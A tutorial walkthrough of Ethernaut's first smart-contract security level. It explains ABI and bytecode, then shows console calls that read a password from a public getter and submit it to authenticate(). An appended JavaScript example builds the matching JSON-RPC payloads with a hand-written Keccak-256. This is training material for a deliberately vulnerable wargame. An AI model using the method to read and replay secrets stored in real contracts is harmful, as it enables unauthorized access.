Make a smart contract do things it didn’t want to…

This is an in-depth series around Zeppelin’s smart contract security puzzles. I’ll give you the direct resources and key concepts you’ll need to solve the puzzles 100% on your own.

Over the next weeks, we’ll reproduce how some serious hacks were induced, notably:

- $50M DAO hack: resulting from a re-entrancy problem
- $30M Parity hack: induced by a delegatecall() exploitation

Required: basic knowledge of smart contract development

How Ethernaut works

Smart contract source code is compiled (by the Solidity compiler, not by the EVM itself) into two artifacts:

- Application Binary Interface (ABI): a JSON description of the contract’s functions, their argument types and return types. It is the communication layer between Solidity and JavaScript: Web3 uses it to encode calls and decode results.
- Bytecode: the low-level machine code that is deployed to the chain and executed by the Ethereum Virtual Machine (EVM).

When you request “get a new instance” for a level, Ethernaut deploys the compiled bytecode to a new address on the Ropsten test network.

Once this new instance is created on the blockchain, its address is returned to your web client through an event, as seen in the game’s main contract, Ethernaut.sol: https://github.com/OpenZeppelin/ethernaut/blob/master/contracts/Ethernaut.sol

Finally, Web3 wraps the ABI around this new contract instance and lets you interact with the contract through your browser console. Notice that all `public` functions are available in the web client.

Detailed Walkthrough

This level requires you to guess a secret password in order to “get cleared” to move on.

1. Notice that Ethernaut passed a secret `_password` into the constructor when it created your contract instance:

```solidity
function Instance(string _password) public {
  password = _password;
}
```

2. This password is stored as a `public string` variable:

```solidity
string public password;
```

3. All public state variables of basic types in Solidity get an auto-generated getter function with the same name.
This means you can directly read this not-so-secret password by typing into the console:

```javascript
await contract.password()
```

You can use async/await to work with Web3 promises with more ease. Reading a getter is a plain call: it sends no transaction and costs no gas.

4. To pass this level, simply call the final `authenticate` function and pass in the retrieved password, via the console:

```javascript
await contract.authenticate("[password here]");
```

The `authenticate` function modifies storage, so this is a transaction rather than a call: expect to pay some gas when you send it.

5. Finally, you should be able to double check that you’ve passed this level:

```javascript
await contract.getCleared();
```

Key Security Takeaways

- All code and storage on a public blockchain is readable by anyone; a `public` getter merely makes reading it convenient.
- Never store passwords or other secrets directly inside a smart contract, not even as `private` variables, as we’ll learn shortly.

More Levels

- Ethernaut Lvl 1 Walkthrough: how to abuse the Fallback function (hackernoon.com)
- Ethernaut Lvl 2 Fallout Walkthrough: how simple developer errors become big mistakes (medium.com)
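As an added example (not code from the original post or from the Ethernaut project), here is what the two console calls in the walkthrough above do under the hood. A Web3 contract wrapper takes each function signature from the ABI, hashes it with Keccak-256 to get a 4-byte selector, ABI-encodes the arguments, and sends either a read-only `eth_call` (for the `password()` getter, no gas) or an `eth_sendTransaction` (for `authenticate(string)`, which writes storage and costs gas) over JSON-RPC. A small Keccak implementation is included so the block runs offline in plain Node with no dependencies; the contract and player addresses are placeholders I made up, not real Ropsten deployments, and the password value is a constructed sample.

```javascript
// Added example, not from the original post or the Ethernaut project: a minimal,
// dependency-free reconstruction of what Web3 does for `contract.password()` and
// `contract.authenticate(pw)`. Addresses below are made-up placeholders.
const MASK64 = (1n << 64n) - 1n;
const RC = [ // Keccak-f[1600] round constants
  0x0000000000000001n, 0x0000000000008082n, 0x800000000000808an, 0x8000000080008000n,
  0x000000000000808bn, 0x0000000080000001n, 0x8000000080008081n, 0x8000000000008009n,
  0x000000000000008an, 0x0000000000000088n, 0x0000000080008009n, 0x000000008000000an,
  0x000000008000808bn, 0x800000000000008bn, 0x8000000000008089n, 0x8000000000008003n,
  0x8000000000008002n, 0x8000000000000080n, 0x000000000000800an, 0x800000008000000an,
  0x8000000080008081n, 0x8000000000008080n, 0x0000000080000001n, 0x8000000080008008n,
];
// rho rotation offsets, lane index x + 5*y
const ROT = [0, 1, 62, 28, 27, 36, 44, 6, 55, 20, 3, 10, 43, 25, 39, 41, 45, 15, 21, 8, 18, 2, 61, 56, 14];
const rotl = (v, n) => ((v << BigInt(n)) | (v >> BigInt(64 - n))) & MASK64;

function keccakF(s) { // permutation over 25 little-endian 64-bit lanes, in place
  for (let r = 0; r < 24; r++) {
    const c = [0, 1, 2, 3, 4].map(x => s[x] ^ s[x + 5] ^ s[x + 10] ^ s[x + 15] ^ s[x + 20]); // theta
    for (let x = 0; x < 5; x++) {
      const d = c[(x + 4) % 5] ^ rotl(c[(x + 1) % 5], 1);
      for (let y = 0; y < 25; y += 5) s[x + y] ^= d;
    }
    const b = new Array(25); // rho + pi
    for (let x = 0; x < 5; x++)
      for (let y = 0; y < 5; y++) b[y + 5 * ((2 * x + 3 * y) % 5)] = rotl(s[x + 5 * y], ROT[x + 5 * y]);
    for (let x = 0; x < 5; x++) // chi
      for (let y = 0; y < 5; y++) s[x + 5 * y] = b[x + 5 * y] ^ (~b[(x + 1) % 5 + 5 * y] & MASK64 & b[(x + 2) % 5 + 5 * y]);
    s[0] ^= RC[r]; // iota
  }
}

// Keccak-256 as Ethereum uses it (original 0x01 padding, not NIST SHA3-256), rate 136 bytes.
function keccak256(bytes) {
  const rate = 136, s = new Array(25).fill(0n);
  const padded = new Uint8Array(Math.ceil((bytes.length + 1) / rate) * rate);
  padded.set(bytes);
  padded[bytes.length] ^= 0x01;
  padded[padded.length - 1] ^= 0x80;
  for (let off = 0; off < padded.length; off += rate) {
    for (let i = 0; i < rate / 8; i++) {
      let lane = 0n;
      for (let j = 7; j >= 0; j--) lane = (lane << 8n) | BigInt(padded[off + i * 8 + j]);
      s[i] ^= lane;
    }
    keccakF(s);
  }
  return Uint8Array.from({ length: 32 }, (_, i) => Number((s[i >> 3] >> BigInt(8 * (i & 7))) & 0xffn));
}

const toHex = (bytes) => Array.from(bytes, b => b.toString(16).padStart(2, '0')).join('');
const utf8 = (str) => new TextEncoder().encode(str);
const word = (n) => n.toString(16).padStart(64, '0'); // one 32-byte ABI word

// Function selector: first 4 bytes of keccak256 of the canonical signature from the ABI.
function selector(signature) {
  return '0x' + toHex(keccak256(utf8(signature)).slice(0, 4));
}

// ABI-encode a single dynamic `string` argument: offset word, length word, data right-padded to 32 bytes.
function encodeString(str) {
  const data = utf8(str);
  return word(32) + word(data.length) + toHex(data).padEnd(Math.ceil(data.length / 32) * 64, '0');
}

// Decode the ABI-encoded `string` that an eth_call to the `password()` getter returns.
function decodeString(hex) {
  const h = hex.replace(/^0x/, '');
  const offset = parseInt(h.slice(0, 64), 16) * 2;
  const length = parseInt(h.slice(offset, offset + 64), 16) * 2;
  const data = h.slice(offset + 64, offset + 64 + length);
  return new TextDecoder().decode(Uint8Array.from(data.match(/../g) || [], x => parseInt(x, 16)));
}

// `await contract.password()` -> read-only eth_call against the getter: no transaction, no gas.
function passwordCall(contract) {
  return { jsonrpc: '2.0', id: 1, method: 'eth_call',
           params: [{ to: contract, data: selector('password()') }, 'latest'] };
}

// `await contract.authenticate(pw)` -> eth_sendTransaction: writes storage, so it is mined and costs gas.
function authenticateTx(contract, from, pw) {
  return { jsonrpc: '2.0', id: 2, method: 'eth_sendTransaction',
           params: [{ from, to: contract, data: selector('authenticate(string)') + encodeString(pw) }] };
}

// Placeholder addresses and a constructed sample password, not a real Ropsten instance.
const LEVEL = '0x' + '11'.repeat(20), PLAYER = '0x' + '22'.repeat(20);
console.log(JSON.stringify(passwordCall(LEVEL)));
console.log(JSON.stringify(authenticateTx(LEVEL, PLAYER, 'ethernaut0')));
```

Point any JSON-RPC client at a node and these two payloads are the whole exploit: the getter’s selector is derived from a public signature, so nothing about the contract’s ABI or its address is secret, and `eth_call` returns the “password” to anyone who asks. The same selector-and-encode path is what the Ethernaut console performs for you; the only difference between the two requests is that the second one is signed and mined, which is why it costs gas.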